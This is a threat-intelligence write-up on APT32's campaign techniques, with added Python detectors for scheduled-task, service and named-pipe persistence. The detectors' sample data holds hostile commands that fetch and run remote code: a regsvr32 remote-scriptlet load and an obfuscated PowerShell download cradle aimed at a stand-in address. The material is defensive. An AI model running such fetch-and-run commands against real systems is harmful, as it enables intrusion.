APT32 (aka Ocean Lotus) is a threat actor tracked by FireEye since 2014 and allegedly linked to the Vietnamese state. It targets multinational businesses with interests in Vietnam, both private-sector companies and government-related institutions.
Among the victims are technology infrastructure, network security and consulting firms, banks, media, hospitality and consumer-products companies, government agencies, research institutes, maritime agencies, sea construction and shipping enterprises, and even journalists, activists, dissidents and bloggers.
A spokeswoman for the Vietnamese Ministry of Foreign Affairs has condemned the attacks and denied any state involvement in APT32.
This APT group leverages "trendy", newly published security-research techniques that have proven effective and stealthy. Its toolbox contains an unusual number of capabilities tailor-made to bypass the victim's defenses and move laterally until the goal is reached.
Initial Infection Vector
In their latest campaign, Ocean Lotus used spear-phishing emails with attached ActiveMime files: tailor-made documents with double extensions such as "Instructions to GSIS.doc.mht", disguised as Word documents carrying OLE macro code. The lure persuades the victim to enable macros, which launches the actual deployer: embedded VBA code that decodes a Base64 string into PowerShell commands and SCHTASKS invocations.
Another smart method in this initial vector is "marketing"-style analytics. Tracking images embedded in the MHT file call back to the attacker when the document is opened, so he can see who took the bait, collect the victims' IP addresses, and count how many targets fell into the trap.
The MHT deployer installs two scheduled tasks on its infected endpoint:
The first is a COM scriptlet, launched every 30 minutes. It uses an application-whitelisting bypass published by SubTee (Casey Smith) to avoid being blocked: regsvr32's /i switch accepts a URL, so a signed Microsoft binary fetches a remote scriptlet (.sct) and runs the script inside it, and application whitelisting never sees an unsigned executable. The attacker uses this to pull a Meterpreter reverse-shell backdoor from one of his servers. Once launched, it injects itself into memory and loads Cobalt Strike's BEACON, which talks to the C2 server through a "safebrowsing" Malleable C2 profile. Such a profile makes the C2 traffic look like legitimate, custom-tailored HTTP; for example, an attacker inside an organization that uses AWS can write a profile that mimics AWS HTTP traffic.
The second scheduled task, launched every 50 minutes, executes PowerShell code obfuscated with Invoke-Obfuscation (released by Daniel Bohannon). The point of Invoke-Obfuscation is to evade blocking and detection by security products such as EDRs, next-gen AVs and traditional AVs.
This PowerShell code acts as a backup backdoor, a common pattern nowadays.
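As an added example (not code from the original article or from APT32's toolset), the following Python triage script shows how a defender would spot the persistence chain just described in process-creation telemetry: a schtasks /create whose action is a regsvr32 remote-scriptlet load, a bare regsvr32 /i:http... scrobj.dll, and a PowerShell -EncodedCommand whose decoded body carries Invoke-Obfuscation-style hallmarks. The log records, the address 198.51.100.7 and the obfuscated one-liner are constructed for the example, and the marker list is a heuristic, not a complete Invoke-Obfuscation signature.

```python
"""Triage process-creation events for the APT32-style persistence chain:
schtasks-installed tasks running a regsvr32 remote scriptlet (the SubTee
application-whitelisting bypass) or encoded, obfuscated PowerShell.
Added example with constructed log records; not code from the article."""
import base64
import re

# regsvr32 /s /n /u /i:http://host/file.sct scrobj.dll
SQUIBLYDOO = re.compile(r"/i:\s*https?://\S+.*\bscrobj\.dll", re.I)
# powershell -e / -ec / -enc / -EncodedCommand <Base64 of UTF-16LE script>
ENCODED_ARG = re.compile(
    r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Heuristic hallmarks of Invoke-Obfuscation output (assumption: two or more
# markers in one script is reported as obfuscated).
OBFUSCATION_MARKERS = {
    "backtick-in-token": re.compile(r"[A-Za-z]`[A-Za-z]"),    # Ne`w-Object
    "string-concat":     re.compile(r"\('[^']+'\+'[^']+'\)"),  # ('I'+'EX')
    "char-cast":         re.compile(r"\[char\]\s*\d+", re.I),  # [char]105
    "join":              re.compile(r"-join\b", re.I),
    "download-cradle":   re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.I),
}


def encode_powershell(script):
    """Encode a script the way -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand body, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def obfuscation_markers(script):
    """Names of the OBFUSCATION_MARKERS that fire on a decoded script."""
    return [name for name, rx in OBFUSCATION_MARKERS.items() if rx.search(script)]


def classify(image, cmdline):
    """Findings for one (process image, command line) event; [] if nothing fires."""
    findings = []
    exe = re.sub(r"\.exe$", "", image.rsplit("\\", 1)[-1].lower())
    if exe == "schtasks" and re.search(r"\s/create\b", cmdline, re.I):
        # Apply the same rules to the task action given with /tr "...".
        m = re.search(r'/tr\s+"([^"]*)"|/tr\s+(\S+)', cmdline, re.I)
        if m:
            action = m.group(1) or m.group(2)
            findings.append("scheduled-task-persistence")
            findings += classify(action.split()[0], action)
    if exe == "regsvr32" and SQUIBLYDOO.search(cmdline):
        findings.append("regsvr32-remote-scriptlet")
    if exe == "powershell":
        script = decode_encoded_command(cmdline)
        if script is not None:
            findings.append("powershell-encoded-command")
            if len(obfuscation_markers(script)) >= 2:
                findings.append("powershell-obfuscated")
    return findings


def scan(events):
    """Return {command line: findings} for every event that triggers a rule."""
    hits = {}
    for image, cmdline in events:
        findings = classify(image, cmdline)
        if findings:
            hits[cmdline] = findings
    return hits


# Constructed sample (not real APT32 telemetry); 198.51.100.7 is a
# documentation address standing in for the attacker's server.
OBFUSCATED_SCRIPT = (
    "&('I'+'EX') ((&(\"Ne`w-Object\") Net.WebClient)"
    ".DownloadString('http://198.51.100.7/stage2'))"
)
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\schtasks.exe",
     'schtasks /create /sc minute /mo 30 /tn "Microsoft Update" '
     '/tr "regsvr32 /s /n /u /i:http://198.51.100.7/update.sct scrobj.dll"'),
    (r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://198.51.100.7/update.sct scrobj.dll"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -NoP -W Hidden -EncodedCommand " + encode_powershell(OBFUSCATED_SCRIPT)),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -Command Get-Service"),
]

if __name__ == "__main__":
    for cmdline, findings in scan(SAMPLE_EVENTS).items():
        print(", ".join(findings), "<-", cmdline[:80])
```

Decoding the -EncodedCommand body before matching matters: the Base64 hides every keyword from a plain string match on the command line, and Invoke-Obfuscation makes a single keyword match unreliable even after decoding, which is why the script counts several independent markers.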
In some older cases, the attackers create persistence as a Windows service whose name mimics a legitimate Microsoft service but carries additional non-printing characters.
The C2 techniques used by the backdoors include a variety of protocols: DNS, ICMP, "safebrowsing" HTTP, and raw TCP packets.
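An added example (not from the original article) of how to catch the service-name trick described above: the check below strips non-printing characters from each service name and reports names that only look legitimate once those characters are removed. The inventory and the short allow-list of Microsoft service names are constructed for the example; a real check would compare against a baseline exported from a clean host.

```python
"""Find services whose name mimics a legitimate Microsoft service but hides
extra non-printing characters.  Added example; the inventory is constructed."""
import unicodedata

# Assumption: a short allow-list of well-known Microsoft service names; a real
# check would load the full baseline from a clean reference host.
KNOWN_MICROSOFT_SERVICES = {"wuauserv", "Spooler", "W32Time", "WinDefend", "Schedule"}


def hidden_characters(name):
    """(index, code point, Unicode name) for every non-printing character."""
    return [(i, "U+%04X" % ord(ch), unicodedata.name(ch, "<unnamed>"))
            for i, ch in enumerate(name) if not ch.isprintable()]


def visible_name(name):
    """The name as it appears on screen, with non-printing characters dropped."""
    return "".join(ch for ch in name if ch.isprintable())


def suspicious_services(services):
    """services: iterable of service names.  Returns one record per name that
    carries hidden characters, noting whether the visible part impersonates a
    known Microsoft service (an exact match would be the real one)."""
    findings = []
    for name in services:
        hidden = hidden_characters(name)
        if not hidden:
            continue
        visible = visible_name(name)
        findings.append({
            "name": name,
            "visible": visible,
            "hidden": hidden,
            "impersonates": visible in KNOWN_MICROSOFT_SERVICES,
        })
    return findings


# Constructed inventory: two legitimate entries, a look-alike with a trailing
# zero-width space, one with a no-break space, and an odd but non-mimicking name.
SAMPLE_SERVICES = [
    "wuauserv",
    "Spooler",
    "wuauserv\u200b",
    "W32Time\u00a0",
    "Helper\x01",
]

if __name__ == "__main__":
    for f in suspicious_services(SAMPLE_SERVICES):
        print(repr(f["name"]), "->", f["visible"], f["hidden"],
              "impersonates a Microsoft service" if f["impersonates"] else "")
```

Python's str.isprintable treats control, format and non-ASCII space characters as non-printing, which is exactly the set that leaves a name looking identical in the Services console while keeping it distinct for the Service Control Manager.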
Privilege Escalation and Credential Theft
APT32 uses several methods to gain higher privileges, both on the local computer it infected and in the domain where it established a foothold. For local privileges, it exploited CVE-2016-7255 to gain SYSTEM; the vulnerability affects unpatched Windows versions from Windows 7 through Windows 10 build 1607.
For high-privileged domain credentials, the attacker uses Mimikatz to dump credentials and then leverages Pass-the-Hash, Pass-the-Ticket and Overpass-the-Hash to reuse them across the domain. In several cases, the attacker used "local admin traversal": reusing the same local Administrator credentials, shared across machines in the domain, to move laterally.
Reconnaissance and Lateral Movement
After establishing a foothold on a machine, the attacker performs both local host reconnaissance and Active Directory domain reconnaissance to understand the environment he is in.
The next step is lateral movement: pivoting from machine to machine until the final destination is reached. To do this the attacker uses PowerShell commands, legitimate sysadmin tools, and Cobalt Strike's SMB named-pipe peer-to-peer C2, creating a named pipe on each machine he lands on so that beacons chain through already-compromised hosts instead of each one talking to the internet.
One unique method of spreading malware is manipulating a McAfee ePO server. Compromising the ePO server in most cases gives the attacker effective control of the whole domain: using ePO's agent deployment system, he pushes his malware as a package and gets direct access to every managed machine.
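An added example (not from the original article) of what the SMB named-pipe peer-to-peer C2 described above looks like from the SOC side: a small Python triage over constructed Sysmon named-pipe events (ID 17 PipeCreated, ID 18 PipeConnected) that flags Cobalt Strike's default SMB-beacon pipe names and pipe servers started from user-writable paths, and correlates pipe names seen on more than one host. Hostnames, images and pipe names are constructed; the default-name list covers the out-of-the-box values, which operators routinely change in their Malleable C2 profile.

```python
"""Triage Sysmon named-pipe events (ID 17 PipeCreated / ID 18 PipeConnected)
for Cobalt Strike SMB-beacon peer-to-peer C2.  Added example; events constructed."""
import re
from collections import defaultdict

# Cobalt Strike default pipe names: the msagent_## SMB beacon pipe, postex_####
# post-exploitation job pipes, the MSSE-###-server stager pipe and status_##
# pipes.  Operators change these via Malleable C2, so a miss is not "clean".
DEFAULT_PIPE_PATTERNS = {
    "smb-beacon": re.compile(r"^\\msagent_[0-9a-f]{2}$", re.I),
    "postex-job": re.compile(r"^\\postex_[0-9a-f]{4}$", re.I),
    "stager":     re.compile(r"^\\MSSE-\d{3,4}-server$", re.I),
    "status":     re.compile(r"^\\status_[0-9a-f]{2}$", re.I),
}
# Pipe servers normally live under System32 or Program Files, not user-writable paths.
USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|Users\\Public|ProgramData)\\", re.I)


def triage_pipe_event(ev):
    """Findings for one Sysmon pipe event; [] if nothing fires."""
    findings = []
    for label, rx in DEFAULT_PIPE_PATTERNS.items():
        if rx.match(ev["PipeName"]):
            findings.append("cobalt-strike-default-pipe:" + label)
    if ev["EventID"] == 17 and USER_WRITABLE.search(ev["Image"]):
        findings.append("pipe-server-from-user-writable-path")
    return findings


def pipes_seen_on_multiple_hosts(events):
    """Pipe names created (ID 17) on more than one host.  The SMB beacon chain
    creates the same pipe on every host the operator pivots through, so a
    non-standard pipe name recurring across workstations is the P2P pattern."""
    hosts = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 17:
            hosts[ev["PipeName"]].add(ev["Computer"])
    return {pipe: h for pipe, h in hosts.items() if len(h) > 1}


def triage(events):
    """(host, pipe name, findings) for every event that triggers a rule."""
    out = []
    for ev in events:
        findings = triage_pipe_event(ev)
        if findings:
            out.append((ev["Computer"], ev["PipeName"], findings))
    return out


# Constructed Sysmon-style events (not real telemetry): two hosts, one beacon
# pipe created on both, a post-exploitation job pipe, and legitimate pipes.
SAMPLE_EVENTS = [
    {"EventID": 17, "Computer": "WS01", "Image": r"C:\Windows\System32\svchost.exe",
     "PipeName": r"\atsvc"},
    {"EventID": 17, "Computer": "WS01", "Image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "PipeName": r"\msagent_3f"},
    {"EventID": 17, "Computer": "WS02", "Image": r"C:\Windows\System32\rundll32.exe",
     "PipeName": r"\msagent_3f"},
    {"EventID": 18, "Computer": "WS02", "Image": r"C:\Windows\System32\rundll32.exe",
     "PipeName": r"\postex_a1b2"},
    {"EventID": 17, "Computer": "WS02", "Image": r"C:\Windows\System32\spoolsv.exe",
     "PipeName": r"\spoolss"},
    {"EventID": 17, "Computer": "WS01", "Image": r"C:\Users\victim\AppData\Local\Temp\update.exe",
     "PipeName": r"\updater"},
]

if __name__ == "__main__":
    for host, pipe, findings in triage(SAMPLE_EVENTS):
        print(host, pipe, ", ".join(findings))
    print("pipes on multiple hosts:", pipes_seen_on_multiple_hosts(SAMPLE_EVENTS))
```

The cross-host correlation is the part worth keeping even when the pipe names are customised: a default-name match is a quick win, but a pipe name that is not in the baseline and shows up on several workstations within a short window is the signal that survives a Malleable C2 profile change.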
APT32 may use up-to-date, trendy techniques to achieve its goals, but the flow of the campaign is the same as in every other APT campaign uncovered lately: initial infection by phishing, privilege escalation, reconnaissance, lateral movement and, finally, exfiltration of the stolen data. After infecting a computer and establishing a foothold, the attackers use built-in capabilities (Active Directory among them) to discover where the crucial information is and how to take it. And because Active Directory exposes that information to any domain user by design, it is usually left unprotected.
Bypassing conventional security products has become easy thanks to the crowd: open-source red-team tooling is more popular than ever before.